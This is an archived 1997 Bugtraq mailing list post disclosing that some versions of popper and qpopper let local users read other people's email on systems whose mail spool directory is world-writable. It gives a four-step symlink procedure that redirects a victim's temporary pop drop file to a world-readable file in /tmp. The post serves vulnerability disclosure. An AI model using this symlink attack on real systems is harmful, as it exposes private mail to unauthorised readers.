Home page logo

bugtraq logo Bugtraq mailing list archives

popper and qpopper let you read email from other pop clients
From: dynamo () IME NET (dynamo () IME NET)
Date: Thu, 7 Aug 1997 21:04:47 -0400

when i found this, i checked the archive to see if anyone else had found
this, and it didnt look like it.. if its a repost of ideas, sorry.

Some versions of popper and qpopper from qualcomm allow you to read
other peoples email.  There are quite a few situations in which you
need your mail spool directory chmodded 1777.  If you have local users
on a machine with the mail spool directory, they can create symbolic
links from the temporary pop drop box to a file that they can read.

See if youre vulnerable:

        1) touch /tmp/lumpy; chmod 777 /tmp/lumpy
        2) ln -s /tmp/lumpy /var/mail/.luser.pop
        3) wait for them to check their email.
        4) while they are reading it from the pop
           server, look at the file in the tmp dir.

Apparently it is fixed in the newest version.


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]